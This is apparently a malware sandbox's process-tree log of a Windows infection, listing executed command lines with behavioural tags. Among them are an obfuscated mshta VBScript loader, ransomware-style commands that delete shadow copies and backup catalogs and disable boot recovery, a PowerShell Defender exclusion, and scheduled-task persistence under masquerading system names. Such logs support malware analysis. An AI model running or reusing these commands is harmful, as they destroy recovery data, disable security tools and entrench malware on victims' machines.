C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\txHD9BkXpatuZCl_5EMufjEw.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\txHD9BkXpatuZCl_5EMufjEw.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\txHD9BkXpatuZCl_5EMufjEw.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\txHD9BkXpatuZCl_5EMufjEw.exe" ) do taskkill -f -iM "%~NxA"2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "txHD9BkXpatuZCl_5EMufjEw.exe"3⤵
- Kills process with taskkill
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 528 -p 4936 -ip 49361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 6252 -ip 62521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3888 -ip 38881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6252 -s 3121⤵
- Program crash
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7408 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 7408 -ip 74081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\1CEC.exeC:\Users\Admin\AppData\Local\Temp\1CEC.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 6296 -ip 62961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6132 -ip 61321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6272 -ip 62721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 6424 -ip 64241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 6352 -ip 63521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 6320 -ip 63201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 6288 -ip 62881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6484 -ip 64841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 31C7A514862FA5256212124777D09F1D C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D8AB627C4728E31F39EE0F2F17E2457F C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0051749EEA49AC2979A21675C5C3DBE02⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1F660AB2A6F4A9EE0838A7B5BFFA83BA C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding FE0037D716C2A6323096B41DD192B50B C2⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffa078bdec0,0x7ffa078bded0,0x7ffa078bdee05⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff7cb049e70,0x7ff7cb049e80,0x7ff7cb049e906⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1596,13747508502647009923,3361582653273304296,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7444_556511167" --mojo-platform-channel-handle=1860 /prefetch:85⤵
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1596,13747508502647009923,3361582653273304296,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7444_556511167" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1616 /prefetch:25⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1596,13747508502647009923,3361582653273304296,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7444_556511167" --mojo-platform-channel-handle=2144 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,13747508502647009923,3361582653273304296,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7444_556511167" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2400 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,13747508502647009923,3361582653273304296,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7444_556511167" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2412 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,13747508502647009923,3361582653273304296,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7444_556511167" --mojo-platform-channel-handle=3012 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1596,13747508502647009923,3361582653273304296,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7444_556511167" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3336 /prefetch:25⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,13747508502647009923,3361582653273304296,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7444_556511167" --mojo-platform-channel-handle=3620 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,13747508502647009923,3361582653273304296,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7444_556511167" --mojo-platform-channel-handle=3004 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,13747508502647009923,3361582653273304296,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7444_556511167" --mojo-platform-channel-handle=2896 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1596,13747508502647009923,3361582653273304296,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7444_556511167" --mojo-platform-channel-handle=3660 /prefetch:85⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Windows security modification
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_85A9.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6448 -ip 64481⤵
-
C:\Users\Admin\AppData\Local\Temp\67C1.exeC:\Users\Admin\AppData\Local\Temp\67C1.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3240 -ip 32401⤵
-
C:\Users\Admin\AppData\Local\Temp\D467.exeC:\Users\Admin\AppData\Local\Temp\D467.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\E9A5.exeC:\Users\Admin\AppData\Local\Temp\E9A5.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 772 -p 5168 -ip 51681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 6580 -ip 65801⤵
-
C:\Users\Admin\AppData\Local\Temp\45C1.exeC:\Users\Admin\AppData\Local\Temp\45C1.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\0bf183cc-ccb6-49db-b8df-368431259374\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\0bf183cc-ccb6-49db-b8df-368431259374\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\0bf183cc-ccb6-49db-b8df-368431259374\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0bf183cc-ccb6-49db-b8df-368431259374\test.bat"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\45C1.exe" -Force2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Users\Admin\AppData\Local\Temp\45C1.exeC:\Users\Admin\AppData\Local\Temp\45C1.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7260 -s 283⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5192 -ip 51921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5504 -ip 55041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\919F.exeC:\Users\Admin\AppData\Local\Temp\919F.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\9980.exeC:\Users\Admin\AppData\Local\Temp\9980.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5668 -s 2882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 364 -p 4648 -ip 46481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\A47E.exeC:\Users\Admin\AppData\Local\Temp\A47E.exe1⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -start2⤵
- Enumerates connected drives
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -agent 03⤵
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet3⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\AFE8.exeC:\Users\Admin\AppData\Local\Temp\AFE8.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 7260 -ip 72601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 8076 -ip 80761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\C69E.exeC:\Users\Admin\AppData\Local\Temp\C69E.exe1⤵
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
-
C:\Users\Public\AccountPictures\WMIADAP.exe"C:\Users\Public\AccountPictures\WMIADAP.exe"2⤵
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5668 -ip 56681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{78d929e5-2f1b-7146-8b4d-936925c49b7a}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000150" "d2e0"2⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\E6AA.exeC:\Users\Admin\AppData\Local\Temp\E6AA.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\F61C.exeC:\Users\Admin\AppData\Local\Temp\F61C.exe1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\10.exeC:\Users\Admin\AppData\Local\Temp\10.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 2802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4984 -s 8762⤵
- Program crash
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4984 -ip 49841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 4876 -ip 48761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\odt\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5928 -ip 59281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "m0hJbaVig6b8SFD60Pu32W_g" /sc ONLOGON /tr "'C:\ProgramData\Desktop\m0hJbaVig6b8SFD60Pu32W_g.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\ModemLogs\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1096 -ip 10961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\WMIADAP.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\msiexec.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4788 -ip 47881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Config.Msi\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Suspicious use of SetThreadContext
- Creates scheduled task(s)
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 356 -p 2956 -ip 29561⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2956 -s 23121⤵
- Program crash
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\explorer.exeexplorer.exe /LOADSAVEDWINDOWS2⤵
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca1⤵
-
